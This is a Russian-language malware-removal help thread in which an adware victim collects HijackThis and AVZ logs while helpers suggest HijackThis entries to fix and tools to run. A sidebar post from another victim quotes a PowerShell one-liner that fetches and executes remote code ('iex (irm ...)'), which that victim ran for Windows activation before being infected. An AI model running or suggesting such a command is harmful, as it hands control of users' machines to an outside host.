Перейти к содержанию
Правила раздела

Вирус Adware

alex36

От alex36
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

alex36 Новичок

alex36

Опубликовано
Опубликовано

Добрый день ! Недавно обнаружил, что в браузерах FireFox IE частенько появляются окна либо с порнорекламой, либо "для получения неограниченного доступа к контенту сайта отправте sms на номер....." Подскажите как можно избавится от данной проблемы? Сканирование антивирусом NOD 4. не дало никаких результатов. Антивирус касперского нашел несколько Trojan-Ransom.Win32.Hexzone.aht и удалил несколько библиотек *lib.dll, но ситуацию это не исправило. Попытка выполнить скрипт "скрипт лечения/карантина для сбора информации ....." в AVZ4 приводит к завершению AVZ4 (ошибка приложения, отправить отчет). Все, что удалось собрать-находится в приложении....

hijackthis.log

virusinfo_syscheck.zip

Ссылка на комментарий
Поделиться на другие сайты
DeNi Профи

DeNi

Опубликовано
Опубликовано

Можно установить продукт ЛК- Kaspersky Internet Security 2009, включить анти-баннер и настроить список белых и черных списков.

Для FireFox могу порекомендовать плагин NoScript, который блокирует исполнение JavaScript до тех, пока вы не добавите узел в разрешенные.

Для IE, наверное, не подскажу.

  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты
alex36 Новичок

alex36

Опубликовано
  • Автор
Опубликовано
Можно установить продукт ЛК- Kaspersky Internet Security 2009, включить анти-баннер и настроить список белых и черных списков.

Для FireFox могу порекомендовать плагин NoScript, который блокирует исполнение JavaScript до тех, пока вы не добавите узел в разрешенные.

Для IE, наверное, не подскажу.

 

можно конечно....Но я пользуюсь связкой outpost+KAV в принципе доволен... Вопрос стоит в том, как бы удалить эту гадость полностью....

Ссылка на комментарий
Поделиться на другие сайты
DeNi Профи

DeNi

Опубликовано
Опубликовано
можно конечно....Но я пользуюсь связкой outpost+KAV в принципе доволен... Вопрос стоит в том, как бы удалить эту гадость полностью....

Эта самая гадость уже сидит на определенном сайте и ждет, пока кто-нибудь зайдет на него, чтобы вылезть.

А если кликнуть на баннер, то на компьютер может быть загружено вредоносное ПО. Тут главное не допустить баннер.

С OutPost не знаком, какие функции он предлагает.

Ссылка на комментарий
Поделиться на другие сайты
alex36 Новичок

alex36

Опубликовано
  • Автор
Опубликовано
Эта самая гадость уже сидит на определенном сайте и ждет, пока кто-нибудь зайдет на него, чтобы вылезть.

А если кликнуть на баннер, то на компьютер может быть загружено вредоносное ПО. Тут главное не допустить баннер.

С OutPost не знаком, какие функции он предлагает.

Дело в том, что банеры открываются даже в ОФлайне и на страницах, где их не должно быть вообще по определению (внутренняя сеть).Т.Е. по-моему мнению, либо загружена какая-то служба, либо висит какая-то dll-ка в памяти и это не обнаруживается KAV. Похоже на какой-то adware вирусочек... А по поводу Outpostа можно почитать здесь http://www.agnitum.ru/products/outpost/index.php

Ссылка на комментарий
Поделиться на другие сайты
alex36 Новичок

alex36

Опубликовано
  • Автор
Опубликовано
Проверьте систему одной из антивирусных утилит.

Проверял уже.. См. пост №1 .Ни один из антивирусов (NOD 4, DRWeb, AdWare) не видит ничего подозрительного. Что-то подобное было замечено лишь KAV при проверке всего диска с максимальными настройками защиты. Вторая проверка не производилась. Все вирусы, найденные при первом проходе были удалены. Сейчас KAV работает в фоновом режиме и при появлении какого-либо банера также тихо-мирно молчит....

Ссылка на комментарий
Поделиться на другие сайты
DeNi Профи

DeNi

Опубликовано
Опубликовано

KAV и должен молчать при появлении баннеров. Это не в его компетенции. Для подавления баннеров целесообразней использовать KIS, который уже вам обеспечит комплексную и полную защиту в сети Интернет. KAV- базовая защита.

Ссылка на комментарий
Поделиться на другие сайты
ТроПа Ветеран

ТроПа

Опубликовано
Опубликовано
Попытка выполнить скрипт "скрипт лечения/карантина для сбора информации ....."

 

Попробуйте сделать так создайте bat файл следующеего содержания start avz.exe VI_Log_Path="C:\"

Потом запустите этот bat-файл и выполните стандартный скрипт 3. Потом проверьте корень диска C на наличие лога virusinfo_syscure.zip

Ссылка на комментарий
Поделиться на другие сайты
alex36 Новичок

alex36

Опубликовано
  • Автор
Опубликовано
Попробуйте сделать так создайте bat файл следующеего содержания start avz.exe VI_Log_Path="C:\"

Потом запустите этот bat-файл и выполните стандартный скрипт 3. Потом проверьте корень диска C на наличие лога virusinfo_syscure.zip

Попробовал - не получилось.(картинка с результатом во вложении). Также во вложении свежие файлы отчетов (какие получились....)

post-9657-1240988764_thumb.jpg

hijackthis.log

virusinfo_syscheck.zip

Ссылка на комментарий
Поделиться на другие сайты
thyrex Мудрец

thyrex

Опубликовано
Опубликовано

Пофиксить в HiJack

 F2 - REG:system.ini: UserInit=userinit.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present

 

Сделайте новые логи

 

AVZ запускаете правой кнопкой от Администратора?

Ссылка на комментарий
Поделиться на другие сайты
alex36 Новичок

alex36

Опубликовано
  • Автор
Опубликовано
Пофиксить в HiJack

 F2 - REG:system.ini: UserInit=userinit.exe
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions present
O6 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present
O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present

 

Сделайте новые логи

 

AVZ запускаете правой кнопкой от Администратора?

Да запуск от администратора... Логи во вложении...

virusinfo_syscheck.zip

hijackthis.log

Ссылка на комментарий
Поделиться на другие сайты
akoK Ветеран

akoK

Опубликовано
Опубликовано

Скачайте RSIT или отсюда. Запустите, выберите проверку файлов за последние три месяца и нажмите продолжить. Должны открыться два отчета log.txt и info.txt. Прикрепите их к следующему сообщению. Если вы их закрыли, то логи по умолчанию сохраняются в одноименной папке (RSIT) в корне системного диска.

Ссылка на комментарий
Поделиться на другие сайты
alex36 Новичок

alex36

Опубликовано
  • Автор
Опубликовано
Скачайте RSIT или отсюда. Запустите, выберите проверку файлов за последние три месяца и нажмите продолжить. Должны открыться два отчета log.txt и info.txt. Прикрепите их к следующему сообщению. Если вы их закрыли, то логи по умолчанию сохраняются в одноименной папке (RSIT) в корне системного диска.

логи во вложении

info.txt

log.txt

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • San4s2034
      Вирус-майнер
      От San4s2034
      Недавно скачал Game of Thrones Genesis с torrent-game.net. Касперски указал, что сайту можно доверять и он проверен. По итогу через время заметил, что в valorant фпс стал заблоченным на 75 и поднимается вверх только если я двигаю мышкой или нажимаю что-то на клавиатуре. Очевидно, что словил майнер. Запустил быструю и полную проверку, результата не дало. Попробовал через защитник windows 11. Заметил, что прогресс доходит до ~70% и потом просто зависает. Запустился через безопасный режим, зашёл в защитник и вылезла ошибка(скриншот). Проверил реестр и групповые политики, ничего нет, все чисто. 

    • fertune
      Вирус dialer.exe
      От fertune
      Когда открываешь диспетчер задач то сначала ЦП грузит на 100% а потом на 10% я посмотрел через dr.web cureit и увидел то что это майнер dialer.exe, смотрел в интернете как пофиксить но никакие способы не помогли(может быть я что то делал неправильно)
      можете помочь с проблемой? Еще я пробовал его фиксить удаляя его но он опять появлялся и грузил ЦП на все 100%.
       
    • Temikst
      Поймал какой-то вирус
      От Temikst
      Приветствую. Сын скачивал какую-то программу для игры, как итог словили какой-то вирус. Dr.web ничего не нашел. но обратил внимание что комп стал тупить, до этого не было так
      CollectionLog-2025.02.09-23.46.zip

       
      Даже браузер сильно тормозит. после открывание диспетчер задач сразу же лучше работает\
    • VanyeJ
      Вирус в PowerShell
      От VanyeJ
      Здравствуйте, при включении компьютера и окончательном входе в систему PowerShell пытается перекинуть на вредоносную ссылку. Касперский сразу же блокирует.

      Событие: Остановлен переход на сайт
      Пользователь: WIN-O4R3Q0UCBR5\User
      Тип пользователя: Инициатор
      Имя приложения: powershell.exe
      Путь к приложению: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Интернет-защита
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: 1731762779-9803.jpeg
      Путь к объекту: 
      Причина: Облачная защита

      Активировал Windows через cmd после этого появилось (powershell iex (irm 'activated.run/key')) команда после которой вирус появился.
      CollectionLog-2025.02.08-15.48.zip
×
×
  • Создать...